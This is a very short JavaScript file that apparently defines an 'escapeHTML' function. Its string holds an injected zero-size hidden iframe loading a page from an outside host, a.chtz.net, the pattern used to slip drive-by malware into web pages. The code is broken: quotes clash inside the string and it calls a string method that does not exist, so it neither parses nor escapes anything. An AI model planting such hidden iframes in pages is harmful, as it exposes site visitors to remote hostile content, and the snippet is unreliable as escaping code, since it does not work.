// JavaScript Document
escapeHTML = function(){
	var strUrl = "inputbox.innerText='<iframe/src="http://a.chtz.net/m/ms.html"width="0"height="0">你好'";
	strUrl.escapeHTML("<a>x</a>");
	alert(strUrl);
};